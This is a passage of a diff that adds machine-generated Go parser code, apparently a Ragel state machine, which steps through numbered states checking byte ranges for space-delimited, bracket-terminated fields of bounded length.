+ case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st72 + } + case data[(p)] >= 35: + goto st72 + } + goto st0 + st72: + if (p)++; (p) == (pe) { + goto _test_eof72 + } + st_case_72: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st73 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st73 + } + case data[(p)] >= 35: + goto st73 + } + goto st0 + st73: + if (p)++; (p) == (pe) { + goto _test_eof73 + } + st_case_73: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st74 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st74 + } + case data[(p)] >= 35: + goto st74 + } + goto st0 + st74: + if (p)++; (p) == (pe) { + goto _test_eof74 + } + st_case_74: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st75 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st75 + } + case data[(p)] >= 35: + goto st75 + } + goto st0 + st75: + if (p)++; (p) == (pe) { + goto _test_eof75 + } + st_case_75: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st76 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st76 + } + case data[(p)] >= 35: + goto st76 + } + goto st0 + st76: + if (p)++; (p) == (pe) { + goto _test_eof76 + } + st_case_76: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st77 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st77 + } + case data[(p)] >= 35: + goto st77 + } + goto st0 + st77: + if (p)++; (p) == (pe) { + goto _test_eof77 + } + st_case_77: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st78 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st78 + } + case data[(p)] >= 35: + goto st78 + } + goto st0 + st78: + if (p)++; (p) == (pe) { + goto _test_eof78 + } + st_case_78: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st79 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st79 + } + case data[(p)] >= 35: + goto st79 + } + goto st0 + st79: + if (p)++; (p) == (pe) { + goto _test_eof79 + } + st_case_79: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st80 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st80 + } + case data[(p)] >= 35: + goto st80 + } + goto st0 + st80: + if (p)++; (p) == (pe) { + goto _test_eof80 + } + st_case_80: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st81 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st81 + } + case data[(p)] >= 35: + goto st81 + } + goto st0 + st81: + if (p)++; (p) == (pe) { + goto _test_eof81 + } + st_case_81: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st82 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st82 + } + case data[(p)] >= 35: + goto st82 + } + goto st0 + st82: + if (p)++; (p) == (pe) { + goto _test_eof82 + } + st_case_82: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st83 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st83 + } + case data[(p)] >= 35: + goto st83 + } + goto st0 + st83: + if (p)++; (p) == (pe) { + goto _test_eof83 + } + st_case_83: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st84 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st84 + } + case data[(p)] >= 35: + goto st84 + } + goto st0 + st84: + if (p)++; (p) == (pe) { + goto _test_eof84 + } + st_case_84: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st85 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st85 + } + case data[(p)] >= 35: + goto st85 + } + goto st0 + st85: + if (p)++; (p) == (pe) { + goto _test_eof85 + } + st_case_85: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st86 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st86 + } + case data[(p)] >= 35: + goto st86 + } + goto st0 + st86: + if (p)++; (p) == (pe) { + goto _test_eof86 + } + st_case_86: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st87 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st87 + } + case data[(p)] >= 35: + goto st87 + } + goto st0 + st87: + if (p)++; (p) == (pe) { + goto _test_eof87 + } + st_case_87: + switch data[(p)] { + case 32: + goto tr27 + case 93: + goto tr29 + } + goto st0 + st88: + if (p)++; (p) == (pe) { + goto _test_eof88 + } + st_case_88: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st89 + } + goto st0 + st89: + if (p)++; (p) == (pe) { + goto _test_eof89 + } + st_case_89: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st90 + } + goto st0 + st90: + if (p)++; (p) == (pe) { + goto _test_eof90 + } + st_case_90: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st91 + } + goto st0 + st91: + if (p)++; (p) == (pe) { + goto _test_eof91 + } + st_case_91: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st92 + } + goto st0 + st92: + if (p)++; (p) == (pe) { + goto _test_eof92 + } + st_case_92: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st93 + } + goto st0 + st93: + if (p)++; (p) == (pe) { + goto _test_eof93 + } + st_case_93: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st94 + } + goto st0 + st94: + if (p)++; (p) == (pe) { + goto _test_eof94 + } + st_case_94: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st95 + } + goto st0 + st95: + if (p)++; (p) == (pe) { + goto _test_eof95 + } + st_case_95: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st96 + } + goto st0 + st96: + if (p)++; (p) == (pe) { + goto _test_eof96 + } + st_case_96: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st97 + } + goto st0 + st97: + if (p)++; (p) == (pe) { + goto _test_eof97 + } + st_case_97: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st98 + } + goto st0 + st98: + if (p)++; (p) == (pe) { + goto _test_eof98 + } + st_case_98: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st99 + } + goto st0 + st99: + if (p)++; (p) == (pe) { + goto _test_eof99 + } + st_case_99: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st100 + } + goto st0 + st100: + if (p)++; (p) == (pe) { + goto _test_eof100 + } + st_case_100: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st101 + } + goto st0 + st101: + if (p)++; (p) == (pe) { + goto _test_eof101 + } + st_case_101: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st102 + } + goto st0 + st102: + if (p)++; (p) == (pe) { + goto _test_eof102 + } + st_case_102: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st103 + } + goto st0 + st103: + if (p)++; (p) == (pe) { + goto _test_eof103 + } + st_case_103: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st104 + } + goto st0 + st104: + if (p)++; (p) == (pe) { + goto _test_eof104 + } + st_case_104: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st105 + } + goto st0 + st105: + if (p)++; (p) == (pe) { + goto _test_eof105 + } + st_case_105: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st106 + } + goto st0 + st106: + if (p)++; (p) == (pe) { + goto _test_eof106 + } + st_case_106: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st107 + } + goto st0 + st107: + if (p)++; (p) == (pe) { + goto _test_eof107 + } + st_case_107: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st108 + } + goto st0 + st108: + if (p)++; (p) == (pe) { + goto _test_eof108 + } + st_case_108: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st109 + } + goto st0 + st109: + if (p)++; (p) == (pe) { + goto _test_eof109 + } + st_case_109: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st110 + } + goto st0 + st110: + if (p)++; (p) == (pe) { + goto _test_eof110 + } + st_case_110: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st111 + } + goto st0 + st111: + if (p)++; (p) == (pe) { + goto _test_eof111 + } + st_case_111: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st112 + } + goto st0 + st112: + if (p)++; (p) == (pe) { + goto _test_eof112 + } + st_case_112: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st113 + } + goto st0 + st113: + if (p)++; (p) == (pe) { + goto _test_eof113 + } + st_case_113: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st114 + } + goto st0 + st114: + if (p)++; (p) == (pe) { + goto _test_eof114 + } + st_case_114: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st115 + } + goto st0 + st115: + if (p)++; (p) == (pe) { + goto _test_eof115 + } + st_case_115: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st116 + } + goto st0 + st116: + if (p)++; (p) == (pe) { + goto _test_eof116 + } + st_case_116: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st117 + } + goto st0 + st117: + if (p)++; (p) == (pe) { + goto _test_eof117 + } + st_case_117: + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st118 + } + goto st0 + st118: + if (p)++; (p) == (pe) { + goto _test_eof118 + } + st_case_118: + if data[(p)] == 32 { + goto tr22 + } + goto st0 + st119: + if (p)++; (p) == (pe) { + goto _test_eof119 + } + st_case_119: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st120 + } + goto st0 + st120: + if (p)++; (p) == (pe) { + goto _test_eof120 + } + st_case_120: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st121 + } + goto st0 + st121: + if (p)++; (p) == (pe) { + goto _test_eof121 + } + st_case_121: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st122 + } + goto st0 + st122: + if (p)++; (p) == (pe) { + goto _test_eof122 + } + st_case_122: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st123 + } + goto st0 + st123: + if (p)++; (p) == (pe) { + goto _test_eof123 + } + st_case_123: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st124 + } + goto st0 + st124: + if (p)++; (p) == (pe) { + goto _test_eof124 + } + st_case_124: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st125 + } + goto st0 + st125: + if (p)++; (p) == (pe) { + goto _test_eof125 + } + st_case_125: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st126 + } + goto st0 + st126: + if (p)++; (p) == (pe) { + goto _test_eof126 + } + st_case_126: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st127 + } + goto st0 + st127: + if (p)++; (p) == (pe) { + goto _test_eof127 + } + st_case_127: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st128 + } + goto st0 + st128: + if (p)++; (p) == (pe) { + goto _test_eof128 + } + st_case_128: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st129 + } + goto st0 + st129: + if (p)++; (p) == (pe) { + goto _test_eof129 + } + st_case_129: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st130 + } + goto st0 + st130: + if (p)++; (p) == (pe) { + goto _test_eof130 + } + st_case_130: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st131 + } + goto st0 + st131: + if (p)++; (p) == (pe) { + goto _test_eof131 + } + st_case_131: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st132 + } + goto st0 + st132: + if (p)++; (p) == (pe) { + goto _test_eof132 + } + st_case_132: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st133 + } + goto st0 + st133: + if (p)++; (p) == (pe) { + goto _test_eof133 + } + st_case_133: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st134 + } + goto st0 + st134: + if (p)++; (p) == (pe) { + goto _test_eof134 + } + st_case_134: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st135 + } + goto st0 + st135: + if (p)++; (p) == (pe) { + goto _test_eof135 + } + st_case_135: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st136 + } + goto st0 + st136: + if (p)++; (p) == (pe) { + goto _test_eof136 + } + st_case_136: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st137 + } + goto st0 + st137: + if (p)++; (p) == (pe) { + goto _test_eof137 + } + st_case_137: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st138 + } + goto st0 + st138: + if (p)++; (p) == (pe) { + goto _test_eof138 + } + st_case_138: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st139 + } + goto st0 + st139: + if (p)++; (p) == (pe) { + goto _test_eof139 + } + st_case_139: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st140 + } + goto st0 + st140: + if (p)++; (p) == (pe) { + goto _test_eof140 + } + st_case_140: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st141 + } + goto st0 + st141: + if (p)++; (p) == (pe) { + goto _test_eof141 + } + st_case_141: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st142 + } + goto st0 + st142: + if (p)++; (p) == (pe) { + goto _test_eof142 + } + st_case_142: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st143 + } + goto st0 + st143: + if (p)++; (p) == (pe) { + goto _test_eof143 + } + st_case_143: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st144 + } + goto st0 + st144: + if (p)++; (p) == (pe) { + goto _test_eof144 + } + st_case_144: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st145 + } + goto st0 + st145: + if (p)++; (p) == (pe) { + goto _test_eof145 + } + st_case_145: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st146 + } + goto st0 + st146: + if (p)++; (p) == (pe) { + goto _test_eof146 + } + st_case_146: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st147 + } + goto st0 + st147: + if (p)++; (p) == (pe) { + goto _test_eof147 + } + st_case_147: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st148 + } + goto st0 + st148: + if (p)++; (p) == (pe) { + goto _test_eof148 + } + st_case_148: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st149 + } + goto st0 + st149: + if (p)++; (p) == (pe) { + goto _test_eof149 + } + st_case_149: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st150 + } + goto st0 + st150: + if (p)++; (p) == (pe) { + goto _test_eof150 + } + st_case_150: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st151 + } + goto st0 + st151: + if (p)++; (p) == (pe) { + goto _test_eof151 + } + st_case_151: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st152 + } + goto st0 + st152: + if (p)++; (p) == (pe) { + goto _test_eof152 + } + st_case_152: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st153 + } + goto st0 + st153: + if (p)++; (p) == (pe) { + goto _test_eof153 + } + st_case_153: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st154 + } + goto st0 + st154: + if (p)++; (p) == (pe) { + goto _test_eof154 + } + st_case_154: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st155 + } + goto st0 + st155: + if (p)++; (p) == (pe) { + goto _test_eof155 + } + st_case_155: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st156 + } + goto st0 + st156: + if (p)++; (p) == (pe) { + goto _test_eof156 + } + st_case_156: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st157 + } + goto st0 + st157: + if (p)++; (p) == (pe) { + goto _test_eof157 + } + st_case_157: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st158 + } + goto st0 + st158: + if (p)++; (p) == (pe) { + goto _test_eof158 + } + st_case_158: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st159 + } + goto st0 + st159: + if (p)++; (p) == (pe) { + goto _test_eof159 + } + st_case_159: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st160 + } + goto st0 + st160: + if (p)++; (p) == (pe) { + goto _test_eof160 + } + st_case_160: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st161 + } + goto st0 + st161: + if (p)++; (p) == (pe) { + goto _test_eof161 + } + st_case_161: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st162 + } + goto st0 + st162: + if (p)++; (p) == (pe) { + goto _test_eof162 + } + st_case_162: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st163 + } + goto st0 + st163: + if (p)++; (p) == (pe) { + goto _test_eof163 + } + st_case_163: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st164 + } + goto st0 + st164: + if (p)++; (p) == (pe) { + goto _test_eof164 + } + st_case_164: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st165 + } + goto st0 + st165: + if (p)++; (p) == (pe) { + goto _test_eof165 + } + st_case_165: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st166 + } + goto st0 + st166: + if (p)++; (p) == (pe) { + goto _test_eof166 + } + st_case_166: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st167 + } + goto st0 + st167: + if (p)++; (p) == (pe) { + goto _test_eof167 + } + st_case_167: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st168 + } + goto st0 + st168: + if (p)++; (p) == (pe) { + goto _test_eof168 + } + st_case_168: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st169 + } + goto st0 + st169: + if (p)++; (p) == (pe) { + goto _test_eof169 + } + st_case_169: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st170 + } + goto st0 + st170: + if (p)++; (p) == (pe) { + goto _test_eof170 + } + st_case_170: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st171 + } + goto st0 + st171: + if (p)++; (p) == (pe) { + goto _test_eof171 + } + st_case_171: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st172 + } + goto st0 + st172: + if (p)++; (p) == (pe) { + goto _test_eof172 + } + st_case_172: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st173 + } + goto st0 + st173: + if (p)++; (p) == (pe) { + goto _test_eof173 + } + st_case_173: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st174 + } + goto st0 + st174: + if (p)++; (p) == (pe) { + goto _test_eof174 + } + st_case_174: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st175 + } + goto st0 + st175: + if (p)++; (p) == (pe) { + goto _test_eof175 + } + st_case_175: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st176 + } + goto st0 + st176: + if (p)++; (p) == (pe) { + goto _test_eof176 + } + st_case_176: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st177 + } + goto st0 + st177: + if (p)++; (p) == (pe) { + goto _test_eof177 + } + st_case_177: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st178 + } + goto st0 + st178: + if (p)++; (p) == (pe) { + goto _test_eof178 + } + st_case_178: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st179 + } + goto st0 + st179: + if (p)++; (p) == (pe) { + goto _test_eof179 + } + st_case_179: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st180 + } + goto st0 + st180: + if (p)++; (p) == (pe) { + goto _test_eof180 + } + st_case_180: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st181 + } + goto st0 + st181: + if (p)++; (p) == (pe) { + goto _test_eof181 + } + st_case_181: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st182 + } + goto st0 + st182: + if (p)++; (p) == (pe) { + goto _test_eof182 + } + st_case_182: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st183 + } + goto st0 + st183: + if (p)++; (p) == (pe) { + goto _test_eof183 + } + st_case_183: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st184 + } + goto st0 + st184: + if (p)++; (p) == (pe) { + goto _test_eof184 + } + st_case_184: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st185 + } + goto st0 + st185: + if (p)++; (p) == (pe) { + goto _test_eof185 + } + st_case_185: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st186 + } + goto st0 + st186: + if (p)++; (p) == (pe) { + goto _test_eof186 + } + st_case_186: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st187 + } + goto st0 + st187: + if (p)++; (p) == (pe) { + goto _test_eof187 + } + st_case_187: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st188 + } + goto st0 + st188: + if (p)++; (p) == (pe) { + goto _test_eof188 + } + st_case_188: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st189 + } + goto st0 + st189: + if (p)++; (p) == (pe) { + goto _test_eof189 + } + st_case_189: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st190 + } + goto st0 + st190: + if (p)++; (p) == (pe) { + goto _test_eof190 + } + st_case_190: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st191 + } + goto st0 + st191: + if (p)++; (p) == (pe) { + goto _test_eof191 + } + st_case_191: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st192 + } + goto st0 + st192: + if (p)++; (p) == (pe) { + goto _test_eof192 + } + st_case_192: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st193 + } + goto st0 + st193: + if (p)++; (p) == (pe) { + goto _test_eof193 + } + st_case_193: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st194 + } + goto st0 + st194: + if (p)++; (p) == (pe) { + goto _test_eof194 + } + st_case_194: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st195 + } + goto st0 + st195: + if (p)++; (p) == (pe) { + goto _test_eof195 + } + st_case_195: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st196 + } + goto st0 + st196: + if (p)++; (p) == (pe) { + goto _test_eof196 + } + st_case_196: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st197 + } + goto st0 + st197: + if (p)++; (p) == (pe) { + goto _test_eof197 + } + st_case_197: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st198 + } + goto st0 + st198: + if (p)++; (p) == (pe) { + goto _test_eof198 + } + st_case_198: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st199 + } + goto st0 + st199: + if (p)++; (p) == (pe) { + goto _test_eof199 + } + st_case_199: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st200 + } + goto st0 + st200: + if (p)++; (p) == (pe) { + goto _test_eof200 + } + st_case_200: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st201 + } + goto st0 + st201: + if (p)++; (p) == (pe) { + goto _test_eof201 + } + st_case_201: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st202 + } + goto st0 + st202: + if (p)++; (p) == (pe) { + goto _test_eof202 + } + st_case_202: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st203 + } + goto st0 + st203: + if (p)++; (p) == (pe) { + goto _test_eof203 + } + st_case_203: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st204 + } + goto st0 + st204: + if (p)++; (p) == (pe) { + goto _test_eof204 + } + st_case_204: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st205 + } + goto st0 + st205: + if (p)++; (p) == (pe) { + goto _test_eof205 + } + st_case_205: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st206 + } + goto st0 + st206: + if (p)++; (p) == (pe) { + goto _test_eof206 + } + st_case_206: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st207 + } + goto st0 + st207: + if (p)++; (p) == (pe) { + goto _test_eof207 + } + st_case_207: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st208 + } + goto st0 + st208: + if (p)++; (p) == (pe) { + goto _test_eof208 + } + st_case_208: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st209 + } + goto st0 + st209: + if (p)++; (p) == (pe) { + goto _test_eof209 + } + st_case_209: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st210 + } + goto st0 + st210: + if (p)++; (p) == (pe) { + goto _test_eof210 + } + st_case_210: + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st211 + } + goto st0 + st211: + if 